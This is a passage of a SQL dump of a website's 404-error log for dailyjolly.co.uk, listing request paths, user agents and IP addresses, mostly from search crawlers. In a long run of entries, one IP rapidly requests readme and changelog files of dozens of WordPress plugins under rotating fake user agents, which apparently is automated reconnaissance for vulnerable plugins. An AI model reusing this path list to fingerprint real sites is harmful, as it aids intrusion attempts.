22:37:43','/jk','https://www.dailyjolly.co.uk','Mozilla/5.0 (Linux; Android 10; Z832 Build/MMB29M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Mobile Safari/537.36','https://www.dailyjolly.co.uk/index.php/jk',404,'GET',NULL,'173.208.253.82'),(37640,'2023-01-28 22:38:30','/glamour_models/dannii-harwood-with-lucy-zara/','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36','http://www.dailyjolly.co.uk/glamour_models/dannii-harwood-with-lucy-zara/',404,'GET',NULL,'49.12.2.252'),(37641,'2023-01-28 22:48:44','/adult-web-cams/mature-web-cams.htm','https://www.dailyjolly.co.uk','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 OPR/89.0.4447.51','http://www.dailyjolly.co.uk/adult-web-cams/mature-web-cams.htm',404,'GET',NULL,'23.95.184.187'),(37642,'2023-01-28 23:40:05','/glamour_models/sexy-suburban-boobs/','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36','http://www.dailyjolly.co.uk/glamour_models/sexy-suburban-boobs/',404,'GET',NULL,'5.75.230.58'),(37643,'2023-01-28 23:57:07','/aq0wwlbe2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(37644,'2023-01-29 00:42:26','/tvge2i8e2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(37645,'2023-01-29 00:45:12','/uk_personal_services/personal_services_south_west.htm','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.46'),(37646,'2023-01-29 00:51:40','/glamour_models/michelle-at-babes-uk/','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36','http://www.dailyjolly.co.uk/glamour_models/michelle-at-babes-uk/',404,'GET',NULL,'168.119.101.84'),(37647,'2023-01-29 00:53:09','/adult-web-cams/mature-web-cams.htm','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; SemrushBot; +http://www.semrush.com/bot.html)','http://www.dailyjolly.co.uk/adult-web-cams/mature-web-cams.htm',404,'HEAD',NULL,'85.208.98.18'),(37648,'2023-01-29 02:36:03','/jk','https://www.dailyjolly.co.uk','Mozilla/5.0 (iPhone; CPU iPhone OS 12_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.4 Mobile/15E148 Safari/604.1','https://www.dailyjolly.co.uk/index.php/jk',404,'GET',NULL,'173.208.253.82'),(37649,'2023-01-29 03:03:05','/jk','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3980 Safari/537.36 Edg/80.0.145.1','https://www.dailyjolly.co.uk/index.php/jk',404,'GET',NULL,'173.208.253.82'),(37650,'2023-01-29 03:18:31','/knowledge-tinker?re=lli&t=75op','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(37651,'2023-01-29 03:41:17','/annuities/tvkeyckd2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.46'),(37652,'2023-01-29 04:05:26','/wp-content/plugins/revslider/release_log.html','https://www.dailyjolly.co.uk','Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36',NULL,404,'GET',NULL,'185.196.220.26'),(37653,'2023-01-29 04:36:00','/author/dailyjolly','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',NULL,404,'GET',NULL,'87.250.224.89'),(37654,'2023-01-29 04:50:37','/something-to-think-about-when-cleaning-the-toilet','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; VelenPublicWebCrawler/1.0; +https://velen.io)','https://dailyjolly.co.uk/something-to-think-about-when-cleaning-the-toilet',404,'GET',NULL,'35.206.136.96'),(37655,'2023-01-29 04:56:14','/sovereignty/9i6eu4wg2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.78'),(37656,'2023-01-29 05:07:46','/jk','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 6.3; WOW64; rv:74.0) Gecko/20100101 Firefox/74.0','https://www.dailyjolly.co.uk/index.php/jk',404,'GET',NULL,'173.208.253.82'),(37657,'2023-01-29 05:13:26','/articles/optical-brighteners/','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)',NULL,404,'GET',NULL,'195.191.219.130'),(37658,'2023-01-29 05:13:30','/articles/our-ingredients/','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)',NULL,404,'GET',NULL,'195.191.219.130'),(37659,'2023-01-29 05:16:01','/friends/boden/','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',NULL,404,'GET',NULL,'213.180.203.87'),(37660,'2023-01-29 05:23:32','/kix9itee2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.78'),(37661,'2023-01-29 05:43:49','/vestigial2/tii4g7re2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(37662,'2023-01-29 05:45:13','/tv0fp13h2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(37663,'2023-01-29 05:58:10','/k4f04q0e2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.46'),(37664,'2023-01-29 05:58:26','/gymnastically41/9beyrb7g2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(37665,'2023-01-29 07:34:43','/jk','https://www.dailyjolly.co.uk','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:103.0) Gecko/20100101 Firefox/103.0','https://www.dailyjolly.co.uk/index.php/jk',404,'GET',NULL,'173.208.253.82'),(37666,'2023-01-29 07:55:45','/faq/phe-cGhlbm/388peru','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(37667,'2023-01-29 07:57:17','/sectarism/wlizbgfe2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(37668,'2023-01-29 08:32:10','/youngness/1y2heare2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(37669,'2023-01-29 08:35:00','/wp-content/plugins/wpcargo/readme.txt','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','https://www.google.com/search?',404,'GET',NULL,'116.203.119.56'),(37670,'2023-01-29 08:35:04','/wp-content/plugins/ulisting/readme.txt','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','https://www.google.com/search?',404,'GET',NULL,'116.203.119.56'),(37671,'2023-01-29 08:35:09','/wp-content/plugins/e-signature/page-template/default/style.css','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','https://www.google.com/search?',404,'GET',NULL,'116.203.119.56'),(37672,'2023-01-29 08:35:14','/wp-content/plugins/tatsu/changelog.md','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','https://www.google.com/search?',404,'GET',NULL,'116.203.119.56'),(37673,'2023-01-29 08:35:24','/wp-content/plugins/sitemap-by-click5/readme.txt','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','https://www.google.com/search?',404,'GET',NULL,'116.203.119.56'),(37674,'2023-01-29 08:35:29','/wp-content/plugins/woo-refund-and-exchange-lite/readme.txt','https://www.dailyjolly.co.uk','Mozilla/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/107.0.5304.101 Mobile/15E148 Safari/604.1','https://www.google.com/search?',404,'GET',NULL,'116.203.119.56'),(37675,'2023-01-29 08:35:45','/wp-content/plugins/nd-learning/readme.txt','https://www.dailyjolly.co.uk','Mozilla/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/107.0.5304.101 Mobile/15E148 Safari/604.1','https://www.google.com/search?',404,'GET',NULL,'116.203.119.56'),(37676,'2023-01-29 08:35:50','/wp-content/themes/listingo/js/listingo_callbacks.js','https://www.dailyjolly.co.uk','Mozilla/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/107.0.5304.101 Mobile/15E148 Safari/604.1','https://www.google.com/search?',404,'GET',NULL,'116.203.119.56'),(37677,'2023-01-29 08:35:55','/wp-content/plugins/wp-pinterest-automatic/changelog','https://www.dailyjolly.co.uk','Mozilla/5.0 (Macintosh; Intel Mac OS X 13_0_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','https://www.google.com/search?',404,'GET',NULL,'116.203.119.56'),(37678,'2023-01-29 08:36:01','/wp-content/plugins/nd-donations/readme.txt','https://www.dailyjolly.co.uk','Mozilla/5.0 (Macintosh; Intel Mac OS X 13_0_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','https://www.google.com/search?',404,'GET',NULL,'116.203.119.56'),(37679,'2023-01-29 08:36:06','/wp-content/plugins/wp-user-avatar/changelog.txt','https://www.dailyjolly.co.uk','Mozilla/5.0 (Macintosh; Intel Mac OS X 13_0_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','https://www.google.com/search?',404,'GET',NULL,'116.203.119.56'),(37680,'2023-01-29 08:36:12','/wp-content/plugins/armember-membership/readme.txt','https://www.dailyjolly.co.uk','Mozilla/5.0 (Macintosh; Intel Mac OS X 13_0_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','https://www.google.com/search?',404,'GET',NULL,'116.203.119.56'),(37681,'2023-01-29 08:36:22','/wp-content/plugins/armember/js/arm_widgets_js.js','https://www.dailyjolly.co.uk','Mozilla/5.0 (Macintosh; Intel Mac OS X 13_0_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','https://www.google.com/search?',404,'GET',NULL,'116.203.119.56'),(37682,'2023-01-29 08:36:28','/wp-content/plugins/armember/documentation/index.html','https://www.dailyjolly.co.uk','Mozilla/5.0 (Macintosh; Intel Mac OS X 13_0_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','https://www.google.com/search?',404,'GET',NULL,'116.203.119.56'),(37683,'2023-01-29 08:36:33','/wp-content/plugins/alphabetic-pagination/readme.txt','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','https://www.google.com/search?',404,'GET',NULL,'116.203.119.56'),(37684,'2023-01-29 08:36:48','/wp-content/plugins/wp-automatic/css/wp-automatic.css','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','https://www.google.com/search?',404,'GET',NULL,'116.203.119.56'),(37685,'2023-01-29 08:36:54','/wp-content/plugins/booking-calendar/readme.txt','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','https://www.google.com/search?',404,'GET',NULL,'116.203.119.56'),(37686,'2023-01-29 08:36:58','/wp-content/plugins/mstore-api/readme.txt','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','https://www.google.com/search?',404,'GET',NULL,'116.203.119.56'),(37687,'2023-01-29 08:37:04','/wp-content/plugins/jobboardwp/readme.txt','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','https://www.google.com/search?',404,'GET',NULL,'116.203.119.56'),(37688,'2023-01-29 08:37:14','/wp-content/plugins/nd-restaurant-reservations/readme.txt','https://www.dailyjolly.co.uk','Mozilla/5.0 (Linux; Android 11; ONEPLUS A6013) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Mobile Safari/537.36','https://www.google.com/search?',404,'GET',NULL,'116.203.119.56'),(37689,'2023-01-29 08:37:19','/wp-content/plugins/nd-booking/readme.txt','https://www.dailyjolly.co.uk','Mozilla/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/107.0.5304.101 Mobile/15E148 Safari/604.1','https://www.google.com/search?',404,'GET',NULL,'116.203.119.56'),(37690,'2023-01-29 08:37:24','/wp-content/plugins/wp-live-chat-support-pro/css/wplc_styles_pro.css','https://www.dailyjolly.co.uk','Mozilla/5.0 (Linux; Android 11; Lenovo YT-J706X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','https://www.google.com/search?',404,'GET',NULL,'116.203.119.56'),(37691,'2023-01-29 08:37:29','/wp-content/plugins/wp-user-extra-fields/js/wpuef-configurator.js','https://www.dailyjolly.co.uk','Mozilla/5.0 (Linux; Android 11; Lenovo YT-J706X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','https://www.google.com/search?',404,'GET',NULL,'116.203.119.56'),(37692,'2023-01-29 08:37:34','/wp-content/plugins/woocommerce-upload-files/js/wcuf-admin-menu.js','https://www.dailyjolly.co.uk','Mozilla/5.0 (Linux; Android 11; Lenovo YT-J706X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','https://www.google.com/search?',404,'GET',NULL,'116.203.119.56'),(37693,'2023-01-29 08:37:41','/wp-content/plugins/wp-file-manager/readme.txt','https://www.dailyjolly.co.uk','Mozilla/5.0 (Linux; Android 11; Lenovo YT-J706X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','https://www.google.com/search?',404,'GET',NULL,'116.203.119.56'),(37694,'2023-01-29 08:37:46','/wp-content/plugins/superlogoshowcase-wp/css/sls-wp-admin.css','https://www.dailyjolly.co.uk','Mozilla/5.0 (Linux; Android 11; ONEPLUS A6013) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Mobile Safari/537.36','https://www.google.com/search?',404,'GET',NULL,'116.203.119.56'),(37695,'2023-01-29 08:37:57','/wp-content/plugins/membership-for-woocommerce/readme.txt','https://www.dailyjolly.co.uk','Mozilla/5.0 (Macintosh; Intel Mac OS X 13_0_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','https://www.google.com/search?',404,'GET',NULL,'116.203.119.56'),(37696,'2023-01-29 08:38:02','/wp-content/themes/greyd_suite/style.css','https://www.dailyjolly.co.uk','Mozilla/5.0 (Macintosh; Intel Mac OS X 13_0_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','https://www.google.com/search?',404,'GET',NULL,'116.203.119.56'),(37697,'2023-01-29 08:38:12','/wp-content/plugins/ninja-forms/readme.txt','https://www.dailyjolly.co.uk','Mozilla/5.0 (Linux; Android 11; Lenovo YT-J706X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','https://www.google.com/search?',404,'GET',NULL,'116.203.119.56'),(37698,'2023-01-29 08:38:17','/wp-content/themes/workreap/style.css','https://www.dailyjolly.co.uk','Mozilla/5.0 (Linux; Android 11; Lenovo YT-J706X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','https://www.google.com/search?',404,'GET',NULL,'116.203.119.56'),(37699,'2023-01-29 08:38:45','/wp-content/plugins/capabilities-pro/readme.txt','https://www.dailyjolly.co.uk','Mozilla/5.0 (Linux; Android 11; ONEPLUS A6013) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Mobile Safari/537.36','https://www.google.com/search?',404,'GET',NULL,'116.203.119.56'),(37700,'2023-01-29 08:38:50','/wp-content/plugins/angwp/__%20UPDATES.txt','https://www.dailyjolly.co.uk','Mozilla/5.0 (Linux; Android 11; ONEPLUS A6013) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Mobile Safari/537.36','https://www.google.com/search?',404,'GET',NULL,'116.203.119.56'),(37701,'2023-01-29 08:38:55','/wp-content/plugins/vc-tabs/readme.txt','https://www.dailyjolly.co.uk','Mozilla/5.0 (Linux; Android 12; SM-A205U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.141 Mobile Safari/537.36','https://www.google.com/search?',404,'GET',NULL,'116.203.119.56'),(37702,'2023-01-29 08:39:01','/wp-content/plugins/dzs-zoomsounds/admin/admin.css','https://www.dailyjolly.co.uk','Mozilla/5.0 (Linux; Android 11; ONEPLUS A6013) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Mobile Safari/537.36','https://www.google.com/search?',404,'GET',NULL,'116.203.119.56'),(37703,'2023-01-29 08:39:06','/wp-content/plugins/masterstudy-lms-learning-management-system/readme.txt','https://www.dailyjolly.co.uk','Mozilla/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/107.0.5304.101 Mobile/15E148 Safari/604.1','https://www.google.com/search?',404,'GET',NULL,'116.203.119.56'),(37704,'2023-01-29 08:39:11','/wp-content/themes/listingo/readme.txt','https://www.dailyjolly.co.uk','Mozilla/5.0 (Linux; Android 11; Lenovo YT-J706X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','https://www.google.com/search?',404,'GET',NULL,'116.203.119.56'),(37705,'2023-01-29 08:39:22','/wp-content/plugins/nd-shortcodes/readme.txt','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','https://www.google.com/search?',404,'GET',NULL,'116.203.119.56'),(37706,'2023-01-29 08:39:28','/wp-content/plugins/ultimate-member/readme.txt','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','https://www.google.com/search?',404,'GET',NULL,'116.203.119.56'),(37707,'2023-01-29 08:39:33','/wp-content/plugins/wp-upg/readme.txt','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','https://www.google.com/search?',404,'GET',NULL,'116.203.119.56'),(37708,'2023-01-29 08:39:44','/wp-content/plugins/wpgateway/css/style.css','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','https://www.google.com/search?',404,'GET',NULL,'116.203.119.56'),(37709,'2023-01-29 08:39:55','/wp-content/plugins/yith-woocommerce-gift-cards-premium/readme.txt','https://www.dailyjolly.co.uk','Mozilla/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/107.0.5304.101 Mobile/15E148 Safari/604.1','https://www.google.com/search?',404,'GET',NULL,'116.203.119.56'),(37710,'2023-01-29 08:40:01','/wp-content/plugins/wp-automatic/changelog','https://www.dailyjolly.co.uk','Mozilla/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/107.0.5304.101 Mobile/15E148 Safari/604.1','https://www.google.com/search?',404,'GET',NULL,'116.203.119.56'),(37711,'2023-01-29 08:40:06','/wp-content/plugins/image-hover-effects-ultimate/readme.txt','https://www.dailyjolly.co.uk','Mozilla/5.0 (Linux; Android 12; SM-A205U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.141 Mobile Safari/537.36','https://www.google.com/search?',404,'GET',NULL,'116.203.119.56'),(37712,'2023-01-29 08:40:11','/wp-content/plugins/woo-product-table/readme.txt','https://www.dailyjolly.co.uk','Mozilla/5.0 (Linux; Android 12; SM-A205U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.141 Mobile Safari/537.36','https://www.google.com/search?',404,'GET',NULL,'116.203.119.56'),(37713,'2023-01-29 08:40:17','/wp-content/plugins/shortcode-addons/readme.txt','https://www.dailyjolly.co.uk','Mozilla/5.0 (Macintosh; Intel Mac OS X 13_0_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','https://www.google.com/search?',404,'GET',NULL,'116.203.119.56'),(37714,'2023-01-29 08:40:22','/wp-content/plugins/scripts-organizer/plugins/meta-box/readme.txt','https://www.dailyjolly.co.uk','Mozilla/5.0 (Macintosh; Intel Mac OS X 13_0_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','https://www.google.com/search?',404,'GET',NULL,'116.203.119.56'),(37715,'2023-01-29 08:40:34','/wp-content/plugins/ait-csv-import-export/changelog.txt','https://www.dailyjolly.co.uk','Mozilla/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/107.0.5304.101 Mobile/15E148 Safari/604.1','https://www.google.com/search?',404,'GET',NULL,'116.203.119.56'),(37716,'2023-01-29 08:40:49','/wp-content/plugins/super-interactive-maps/css/sim-wp-admin.css','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','https://www.google.com/search?',404,'GET',NULL,'116.203.119.56'),(37717,'2023-01-29 08:41:00','/wp-content/plugins/capability-manager-enhanced/readme.txt','https://www.dailyjolly.co.uk','Mozilla/5.0 (Linux; Android 12; SM-A205U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.141 Mobile Safari/537.36','https://www.google.com/search?',404,'GET',NULL,'116.203.119.56'),(37718,'2023-01-29 08:41:06','/wp-content/plugins/superstorefinder-wp/css/ssf-wp-admin.css','https://www.dailyjolly.co.uk','Mozilla/5.0 (Linux; Android 11; Lenovo YT-J706X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','https://www.google.com/search?',404,'GET',NULL,'116.203.119.56'),(37719,'2023-01-29 09:00:33','/wp-content/plugins/wpcargo/readme.txt','https://www.dailyjolly.co.uk','Mozilla/5.0 (Linux; Android 11; ONEPLUS A6013) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Mobile Safari/537.36','https://www.google.com/search?',404,'GET',NULL,'116.203.119.56'),(37720,'2023-01-29 09:00:39','/wp-content/plugins/ulisting/readme.txt','https://www.dailyjolly.co.uk','Mozilla/5.0 (Macintosh; Intel Mac OS X 13_0_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','https://www.google.com/search?',404,'GET',NULL,'116.203.119.56'),(37721,'2023-01-29 09:00:44','/wp-content/plugins/e-signature/page-template/default/style.css','https://www.dailyjolly.co.uk','Mozilla/5.0 (Macintosh; Intel Mac OS X 13_0_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','https://www.google.com/search?',404,'GET',NULL,'116.203.119.56'),(37722,'2023-01-29 09:00:49','/wp-content/plugins/tatsu/changelog.md','https://www.dailyjolly.co.uk','Mozilla/5.0 (Linux; Android 11; ONEPLUS A6013) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Mobile Safari/537.36','https://www.google.com/search?',404,'GET',NULL,'116.203.119.56'),(37723,'2023-01-29 09:00:59','/wp-content/plugins/sitemap-by-click5/readme.txt','https://www.dailyjolly.co.uk','Mozilla/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/107.0.5304.101 Mobile/15E148 Safari/604.1','https://www.google.com/search?',404,'GET',NULL,'116.203.119.56'),(37724,'2023-01-29 09:01:05','/wp-content/plugins/woo-refund-and-exchange-lite/readme.txt','https://www.dailyjolly.co.uk','Mozilla/5.0 (Linux; Android 11; ONEPLUS A6013) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Mobile Safari/537.36','https://www.google.com/search?',404,'GET',NULL,'116.203.119.56'),(37725,'2023-01-29 09:01:22','/wp-content/plugins/nd-learning/readme.txt','https://www.dailyjolly.co.uk','Mozilla/5.0 (Linux; Android 11; Lenovo YT-J706X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','https://www.google.com/search?',404,'GET',NULL,'116.203.119.56'),(37726,'2023-01-29 09:01:27','/wp-content/themes/listingo/js/listingo_callbacks.js','https://www.dailyjolly.co.uk','Mozilla/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/107.0.5304.101 Mobile/15E148 Safari/604.1','https://www.google.com/search?',404,'GET',NULL,'116.203.119.56'),(37727,'2023-01-29 09:01:33','/wp-content/plugins/wp-pinterest-automatic/changelog','https://www.dailyjolly.co.uk','Mozilla/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/107.0.5304.101 Mobile/15E148 Safari/604.1','https://www.google.com/search?',404,'GET',NULL,'116.203.119.56'),(37728,'2023-01-29 09:01:39','/wp-content/plugins/nd-donations/readme.txt','https://www.dailyjolly.co.uk','Mozilla/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/107.0.5304.101 Mobile/15E148 Safari/604.1','https://www.google.com/search?',404,'GET',NULL,'116.203.119.56'),(37729,'2023-01-29 09:01:45','/wp-content/plugins/wp-user-avatar/changelog.txt','https://www.dailyjolly.co.uk','Mozilla/5.0 (Linux; Android 11; Lenovo YT-J706X) AppleWebKit/537.36 (KHTML, like Gecko) 